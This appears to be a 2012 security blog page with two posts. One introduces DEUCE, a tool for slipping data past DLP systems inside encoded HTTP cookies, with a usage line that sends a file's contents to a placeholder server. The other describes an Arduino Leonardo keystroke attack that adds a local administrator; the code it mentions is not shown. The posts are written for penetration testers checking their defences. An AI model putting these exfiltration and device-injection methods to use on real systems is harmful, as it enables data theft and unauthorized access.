Wednesday, July 18, 2012

DEUCE: Bypassing DLP with Cookies

In a recent B-sides event, there was a talk about the exfiltration of data and Data Loss Prevention (DLP) systems. A known vector to bypass DLP, is the use of NSLookup. The attacker requests a domain he controls but adds a hostname that contains the data that needs to be sent outside the controlled environment. This means if an attacker wanted to steal a name and social security number he would request “” This request would hit the DNS server and be logged thus creating a list of identities for the attacker to mine at a later time.  The maximum limit is 255 characters for this kind of attack. This concept got me thinking what about a standard GET request such as this would make life easier for the attacker. He would no longer need to control the DNS server; he would just need to see what pages were requested. We would still be limited by the character maximum and each request could be easily logged and analyzed by proxies or alerting systems.  But, let’s be honest most DLP systems are going to alert on these types of requests, or at least they should.

After some dialog with some friends, it was pointed out that using cookies would be a great alternative. Cookies aren’t normally logged by proxies or other systems. Also if the cookie was encoded or encrypted, as they normally are it would keep the DLP and prying eyes at bay.  As an added benefit we are no longer limited by the 255 character maximum and one request could send many cookies.  

This led to the need to create a tool to test this concept. Enter Data Exfiltration Using Cookie Encryption or DEUCE. DEUCE went from simple concept to a multi-encoding and encryption DLP bypass tool. The program simply takes an input file and creates a cookie for each line.  DEUCE has the ability to encrypt via AES, hash with MD5 or use a custom multi-encode with a 3 times replacement cipher.  The program then sends its data to the server, where the AES and multi-encoded options are automatically converted back to plain text. The MD5 is a one way hash that would need to be cracked. However, if an attacker sent a list of social security numbers it would only take minutes to crack the 9 digits number using a tool like Hashcat. In the Python code you can change the name of the cookie, just make sure you change it in the client and the server.

DEUCE is written in python but could easily be converted to an executable using py2exe or PyInstaller also the AES encryption relies on PyCrypto. Because this is just a proof of concept tool DEUCE does not currently support SSL, but it may in the future.

Using DEUCE is simple. By default the server listens on all interfaces and on port 80. The DEUCE client has more options such as encryption and encoding methods, target URL and input file. Example usage below: 

  • python -o ouput.txt
    • This starts the listening server on all interfaces on port 80 with the output being output.txt
  • python -u http://location_of_deuce_server  -i inputfile.txt -m
    • This starts the DEUCE client and sends all data in the input file to http://location_of_deuce_server using the -m tells DEUCE to use multi-encode mode.

Please feel free to test this concept in your environment; obviously I do not have access to every possible solution out there. It is important to note I am in no way responsible for how you use DEUCE. This tool is designed to help penetration testers and assist users in testing their DLP implementation. You are not permitted to use DEUCE for any illegal means.

Thanks to Brandon Knight (@kaospunk) for the cookie idea and Jake Garlie (@_Jagar_) for listening to me rant about this.



Saturday, July 7, 2012

How to add a local administrator with the Arduino Leonardo.

For a while now security researchers have been using the Teensy for HID attacks. Which really is the way to go if that’s all you want to do. However, if you are like me you want to do other things as well you need something bigger. Enter the Arduino Leonardo, this Arduino board supports emulating a HID (Human Interface Device) out of the box. It’s not tiny like the Teensy but it is only 2.7” x 2.1” in size which is still small. It would be very easy to just leave the Leonardo in a backpack and just run the USB cable to the victim device, especially since the whole attack takes about 5 seconds.

When programming the Leonardo to emulate a HID I really recommend using a button in conjunction with the device, see image below.  This way if you make a mistake you can upload a new sketch.  It would be very difficult to reprogram it if it kept typing add user over and over again.


Here is the attack in action via screen recording.

In the first part of the video I show what users are on the system. Then the device is plugged in and the attack launches.  The Leonardo starts to emulate a keyboard by activating the windows key and then types in cmd.exe. Next it uses the keyboard shortcut for run as admin (ctrl+shift). Then the Leonardo hits tab 3 times to select OK on the UAC protection and hits enter. Finally, an administrator command prompt is open and the Leonardo types out the commands to add user and adds the user to the local administrators group and closes the prompt. The nice part about this is since you write the program there are no typing errors and it types about a hundred times faster than you do. 

The following code is for use with a button. However, feel free to remove that part if you wish

Thanks to  @irongeek_adc for pointing out the Leonardo and answering my questions and to @matthewneely, @SoapyWetDish and @dave_rel1k for other guidance.